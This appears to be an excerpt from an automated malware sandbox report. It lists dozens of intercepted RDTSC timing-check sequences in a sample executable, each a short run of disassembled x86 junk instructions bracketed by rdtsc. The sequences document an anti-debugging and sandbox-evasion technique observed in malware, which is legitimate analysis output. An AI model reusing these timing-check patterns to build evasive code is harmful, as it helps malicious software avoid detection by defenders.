    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A23B8 second address: 7A23BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7643 second address: 7A7653 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7A0B38026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A790C second address: 7A7912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7912 second address: 7A7918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A7918 second address: 7A7929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jo 00007FF7A105DEA6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA3C2 second address: 7AA3C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AA952 second address: 7AA966 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B00A1 second address: 7B00A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B00A5 second address: 7B00AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B00AE second address: 7B00B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF7A0B38026h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B00B9 second address: 7B00C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007FF7A105DEA6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B00C5 second address: 7B00DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B38033h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE971 second address: 7AE977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE977 second address: 7AE982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE982 second address: 7AE986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE986 second address: 7AE98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE98C second address: 7AE992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AE992 second address: 7AE9B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FF7A0B38035h 0x0000000a jns 00007FF7A0B38026h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEC8A second address: 7AEC8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEDDC second address: 7AEE10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B38030h 0x00000007 pushad 0x00000008 jnp 00007FF7A0B38026h 0x0000000e js 00007FF7A0B38026h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a jns 00007FF7A0B3802Ch 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762BEC second address: 762C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FF7A105DEA8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000004h 0x00000026 mov cx, 25F0h 0x0000002a nop 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e push esi 0x0000002f pop esi 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762C35 second address: 762C4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B38032h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762C4F second address: 762C60 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7A105DEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF352 second address: 7AF375 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7A0B3802Eh 0x00000008 jo 00007FF7A0B3802Ch 0x0000000e jnc 00007FF7A0B38026h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF375 second address: 7AF379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B16AE second address: 7B16B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71AC9B second address: 71ACA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71ACA1 second address: 71ACA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71ACA9 second address: 71ACD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF7A105DEB2h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF7A105DEB2h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71ACD5 second address: 71ACDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B71B8 second address: 7B71BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B71BE second address: 7B71CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF7A0B3802Ch 0x0000000a jg 00007FF7A0B38026h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7472 second address: 7B747D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF7A105DEA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B747D second address: 7B749D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 je 00007FF7A0B38032h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7713 second address: 7B7767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF7A105DEB9h 0x0000000d pushad 0x0000000e jmp 00007FF7A105DEB8h 0x00000013 jmp 00007FF7A105DEB8h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7DBD second address: 7B7DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF7A0B38026h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B838C second address: 7B8392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8392 second address: 7B83D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FF7A0B38026h 0x0000000c popad 0x0000000d jno 00007FF7A0B38028h 0x00000013 jbe 00007FF7A0B3805Fh 0x00000019 pushad 0x0000001a jnc 00007FF7A0B38026h 0x00000020 jl 00007FF7A0B38026h 0x00000026 push edx 0x00000027 pop edx 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jp 00007FF7A0B38026h 0x00000031 jmp 00007FF7A0B38031h 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B83D6 second address: 7B83E0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF7A105DEA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCEE9 second address: 7BCEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC1FB second address: 7BC238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF7A105DEA6h 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007FF7A105DEB7h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pop eax 0x00000017 jmp 00007FF7A105DEB4h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC381 second address: 7BC3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FF7A0B3802Ch 0x0000000d jne 00007FF7A0B38038h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FF7A0B38035h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 push ecx 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007FF7A0B38030h 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b jnc 00007FF7A0B38026h 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC53E second address: 7BC542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC542 second address: 7BC54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC54B second address: 7BC557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF7A105DEA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC557 second address: 7BC55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC6AA second address: 7BC6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF7A105DEA6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC7FF second address: 7BC805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC805 second address: 7BC809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC809 second address: 7BC82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF7A0B38036h 0x0000000e jp 00007FF7A0B3802Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C93DE second address: 7C93E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C74BC second address: 7C74D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007FF7A0B38026h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FF7A0B3802Eh 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C74D4 second address: 7C74D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C74D8 second address: 7C74E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C765F second address: 7C7663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7663 second address: 7C7667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7BA9 second address: 7C7BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF7A105DEA6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7BB3 second address: 7C7BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7E91 second address: 7C7E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7E95 second address: 7C7F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF7A0B38026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF7A0B38035h 0x00000012 jc 00007FF7A0B38026h 0x00000018 jmp 00007FF7A0B38034h 0x0000001d jbe 00007FF7A0B38026h 0x00000023 popad 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 pop eax 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c popad 0x0000002d jo 00007FF7A0B38041h 0x00000033 pushad 0x00000034 popad 0x00000035 jmp 00007FF7A0B38039h 0x0000003a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8060 second address: 7C8068 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8068 second address: 7C808E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B3802Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FF7A0B38036h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C808E second address: 7C80A4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF7A105DEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FF7A105DEA8h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C925B second address: 7C927D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7A0B38044h 0x00000008 jmp 00007FF7A0B38038h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB71E second address: 7DB729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FF7A105DEA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72328D second address: 723293 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFB80 second address: 7DFBAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF7A105DEB6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF58B second address: 7EF59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FF7A0B38026h 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF59C second address: 7EF5A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FF7A105DEA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EF5A7 second address: 7EF5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF7A0B38030h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F16BC second address: 7F16C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F16C3 second address: 7F16CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF7A0B38026h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F16CF second address: 7F16F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF7A105DEB7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F361E second address: 7F362B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FF7A0B38032h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F362B second address: 7F3631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FBDAA second address: 7FBDB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FBDB0 second address: 7FBDB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC016 second address: 7FC025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC025 second address: 7FC04B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF7A105DEA6h 0x00000008 jbe 00007FF7A105DEA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FF7A105DEB6h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC04B second address: 7FC070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7A0B38034h 0x00000009 jmp 00007FF7A0B3802Dh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC070 second address: 7FC074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC20C second address: 7FC212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC212 second address: 7FC217 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC392 second address: 7FC39E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 ja 00007FF7A0B38026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC6E1 second address: 7FC6FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEB5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC6FC second address: 7FC708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF7A0B38026h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC708 second address: 7FC70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC70C second address: 7FC710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC710 second address: 7FC71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FC71A second address: 7FC71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1B5 second address: 7FD1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1BB second address: 7FD1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1CA second address: 7FD1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFCA0 second address: 7FFCEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A0B38037h 0x00000007 jno 00007FF7A0B38026h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FF7A0B3802Dh 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007FF7A0B38039h 0x0000001c popad 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
